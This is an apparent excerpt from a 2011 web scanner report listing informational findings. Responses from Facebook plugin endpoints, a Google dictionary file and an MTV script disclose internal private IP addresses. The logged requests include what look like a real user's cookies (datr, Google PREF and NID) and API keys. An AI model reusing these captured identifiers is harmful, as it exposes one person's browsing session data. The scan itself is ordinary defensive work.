Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc; wd=280x80

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.159.117
X-Cnection: close
Date: Tue, 14 Jun 2011 00:19:08 GMT
Content-Length: 22

Invalid Application ID
23.10. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=67fc5e01d68cf35eba52297f5bf2ed3d&app_id=67fc5e01d68cf35eba52297f5bf2ed3d&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df26ad6e48%26origin%3Dhttp%253A%252F%252Fonline.wsj.com%252Ff2bfe1068%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df282e93c28%26origin%3Dhttp%253A%252F%252Fonline.wsj.com%252Ff2bfe1068%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df37019a21c%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df6e479cc%26origin%3Dhttp%253A%252F%252Fonline.wsj.com%252Ff2bfe1068%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df37019a21c&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df103fe2ee%26origin%3Dhttp%253A%252F%252Fonline.wsj.com%252Ff2bfe1068%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df37019a21c&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df664004d4%26origin%3Dhttp%253A%252F%252Fonline.wsj.com%252Ff2bfe1068%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df37019a21c&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/news-tech-technology.html?refresh=on
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.100.34
X-Cnection: close
Date: Tue, 14 Jun 2011 00:13:56 GMT
Content-Length: 238

<script type="text/javascript">
parent.postMessage("cb=f103fe2ee&origin=http\u00253A\u00252F\u00252Fonline.wsj.com\u00252Ff2bfe1068&relation=parent&transport=postmessage&frame=f37019a21c", "http:\/\/o
...[SNIP]...
23.11. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=67fc5e01d68cf35eba52297f5bf2ed3d&app_id=67fc5e01d68cf35eba52297f5bf2ed3d&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfd479b14%26origin%3Dhttp%253A%252F%252Fonline.wsj.com%252Ff1cdbf0e3c%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2fa2a0058%26origin%3Dhttp%253A%252F%252Fonline.wsj.com%252Ff1cdbf0e3c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df5e9b5c2c%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df150d2fac4%26origin%3Dhttp%253A%252F%252Fonline.wsj.com%252Ff1cdbf0e3c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df5e9b5c2c&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df35aae5018%26origin%3Dhttp%253A%252F%252Fonline.wsj.com%252Ff1cdbf0e3c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df5e9b5c2c&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1ae8bd5c4%26origin%3Dhttp%253A%252F%252Fonline.wsj.com%252Ff1cdbf0e3c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df5e9b5c2c&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424052702304665904576383880754844512.html?mod=WSJ_Tech_LEADTop
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.51.34
X-Cnection: close
Date: Tue, 14 Jun 2011 00:14:12 GMT
Content-Length: 240

<script type="text/javascript">
parent.postMessage("cb=f35aae5018&origin=http\u00253A\u00252F\u00252Fonline.wsj.com\u00252Ff1cdbf0e3c&relation=parent&transport=postmessage&frame=f5e9b5c2c", "http:\/\/
...[SNIP]...
23.12. http://www.facebook.com/plugins/fan.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/fan.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/fan.php?api_key=67fc5e01d68cf35eba52297f5bf2ed3d&connections=10&height=250&id=8304333127&locale=en_US&sdk=joey&stream=false&width=377 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424052702304665904576383880754844512.html?mod=WSJ_Tech_LEADTop
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.27.55
X-Cnection: close
Date: Tue, 14 Jun 2011 00:14:20 GMT
Content-Length: 11488

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class="
...[SNIP]...
23.13. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?app_id=207579405947271&href=http%3A%2F%2Fwww.facebook.com%2Fmtv&send=false&layout=button_count&width=200&show_faces=false&action=like&colorscheme=light&font&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc; wd=85x25

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.229.52
X-Cnection: close
Date: Tue, 14 Jun 2011 00:28:15 GMT
Content-Length: 4747

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class="
...[SNIP]...
23.14. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%253A%252F%252Fwww.yadvertisingblog.com%252Fblog%252Fdownloads%252F&layout=button_count&show_faces=false&width=85&action=like&font=arial&colorscheme=light&height=25 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.yadvertisingblog.com/blog/downloads/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc; wd=85x25

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.221.30
X-Cnection: close
Date: Tue, 14 Jun 2011 00:26:36 GMT
Content-Length: 4837

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class="
...[SNIP]...
23.15. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%253A%252F%252Fwww.yadvertisingblog.com%252Fblog%252F2011%252F05%252F31%252Fyahoo-launches-clear-ad-notice%252F&layout=button_count&show_faces=false&width=85&action=like&font=arial&colorscheme=light&height=25 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.yadvertisingblog.com/blog/2011/05/31/yahoo-launches-clear-ad-notice/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc; wd=280x80

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.158.126
X-Cnection: close
Date: Tue, 14 Jun 2011 00:20:25 GMT
Content-Length: 4907

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class="
...[SNIP]...
23.16. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%3A//www.mtv.com/videos/mike-taylor/659420/perfect.jhtml%3Fxrs%3Dshare_fblike%23id%3D1518072&layout=standard&show_faces=false&width=280&action=like&font=arial&colorscheme=light&height=80 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/videos/mike-taylor/659420/perfect.jhtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc; wd=83x21

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.53.58
X-Cnection: close
Date: Tue, 14 Jun 2011 00:18:02 GMT
Content-Length: 6010

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class="
...[SNIP]...
23.17. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%3A%2F%2Fvideopress.com%2F&layout=button_count&show_faces=false&action=like&colorscheme=light&height=21&locale=en_EN&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://videopress.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc; wd=83x21

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.151.23
X-Cnection: close
Date: Tue, 14 Jun 2011 00:32:27 GMT
Content-Length: 4745

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class="
...[SNIP]...
23.18. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?api_key=67fc5e01d68cf35eba52297f5bf2ed3d&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df337b746ac%26origin%3Dhttp%253A%252F%252Fonline.wsj.com%252Ff1cdbf0e3c%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fonline.wsj.com%2Farticle%2FSB10001424052702304665904576383880754844512.html%3Fmod%3DWSJ_Tech_LEADTop&layout=standard&locale=en_US&node_type=link&sdk=joey&send=true&show_faces=true&width=450 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424052702304665904576383880754844512.html?mod=WSJ_Tech_LEADTop
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.53.32
X-Cnection: close
Date: Tue, 14 Jun 2011 00:14:20 GMT
Content-Length: 8896

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class="
...[SNIP]...
23.19. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?app_id=207579405947271&href=http%3A%2F%2Fwww.facebook.com%2Fmtv&send=false&layout=button_count&width=200&show_faces=false&action=like&colorscheme=light&font&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc; wd=450x29

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.125.48
X-Cnection: close
Date: Tue, 14 Jun 2011 00:16:13 GMT
Content-Length: 4747

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class="
...[SNIP]...
23.20. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?api_key=67fc5e01d68cf35eba52297f5bf2ed3d&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df32597294c%26origin%3Dhttp%253A%252F%252Fonline.wsj.com%252Ff2bfe1068%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Ffacebook.com%2FWSJ&layout=button_count&locale=en_US&node_type=link&ref=WSJ_homepage&sdk=joey&send=false&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/news-tech-technology.html?refresh=on
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.72.35
X-Cnection: close
Date: Tue, 14 Jun 2011 00:14:01 GMT
Content-Length: 6317

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class="
...[SNIP]...
23.21. http://www.google.com/sdch/vD843DpA.dct  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /sdch/vD843DpA.dct

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /sdch/vD843DpA.dct HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=381be2a5a4e321de:U=17ea5243225a615b:FF=0:TM=1305295666:LM=1306388828:GM=1:S=c4JmgYF7VRiR-ADW; NID=47=lorCzpeeruyCsbBVsWEMMq0Dn_FEZO2YvQlh5PbRyvyK-EGYzmwzyA_2p0yLU1EIOsGj5P7ltQDj-N2Ero7RzOq6NjJuFZs5xUAH3SXWEGgb9bkdrXqd248wCK5T3lcc
If-Modified-Since: Sun, 12 Jun 2011 06:51:08 GMT

Response

HTTP/1.1 200 OK
Content-Type: application/x-sdch-dictionary
Last-Modified: Tue, 14 Jun 2011 07:58:30 GMT
Date: Tue, 14 Jun 2011 12:27:46 GMT
Expires: Tue, 14 Jun 2011 12:27:46 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 116591

Domain: .google.com
Path: /search

<!doctype html> <head> <title>re - Google Search</title> <script>window.google={kEI:"28555,29481,2966,29876,29881,29891,30035,30039,30058",kCSI:{e:"25907,4,29
...[SNIP]...
<a href="/search?hl=en&amp;q=related: http://172.31.196.197:8888/search?q=cache: &amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return rwt(this,'','','','1','AFQjCN clk(this.href,'','','','1','','0CCk ')">
...[SNIP]...
<b>www.ahttp://172.31.196.197:8888/search?q=cache: &amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return rwt(this,'','','','2','AFQjCN clk(this.href,'','','',' UBEBYwBg')">
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache:www.edmunds.com/used-cars/+used+carNKvLeHS7sb0J:www.carsdirect.com/used_cars/search+used+car&hl=en&ct=clnk&gl=us&source=www.google.com','','','',' ')">
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: rectv.com/DTVAPP/content/contact_us+directKvzX53GQf98J:www.directv.com/DTVAPP/content/My_Account+direct 4','AFQjCN clk(this.href,'','','','4',''
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: OJ7l3PBi2ywJ:www.usedcars.com/+used+carH75rMPosXksJ:www.cars.com/+used+cary4a-lQGHU2cJ:www.vehix.com/+used+car topics.nytimes.com/top/news/business/ &amp;rct=j&amp;sa=
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache:4AUACFJFdYwJ:search.aol.com/+aol3-ZEIkE37Z4J:www.directv.com/+direct1nPyaj3yx18J:www.orbitz.com/App/DisplayCarSearch+ &amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google
...[SNIP]...
<a href="/search?hl=en&amp;q=related:http://172.31.196.197:8888/search?q=cache: &amp;cd= &amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return rwt(this,'','','','7','AFQjCNGclk(this.href,'','','','1','','0C QIDAG')">
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache:_AF_a1pfx4YJ:www.craigslist.com/+o&amp;cd=8&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return rwt(this,'','','',' clk(this.href,'','','','8',
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: &amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return rwt(this,'','','',' 9','AFQjCNFclk(this.href,'','','','9','','0C en.wikipedia.org
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: &amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return rwt(this,'','','','10','AFQjCNFclk(this.href,'','','','1rwt(this,'','','','1 cl
...[SNIP]...
23.22. http://www.mtv.com/videos/lite/desktop/js/lib.jhtml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mtv.com
Path:   /videos/lite/desktop/js/lib.jhtml

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /videos/lite/desktop/js/lib.jhtml?v=3i HTTP/1.1
Host: www.mtv.com
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/videos/mike-taylor/659420/perfect.jhtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
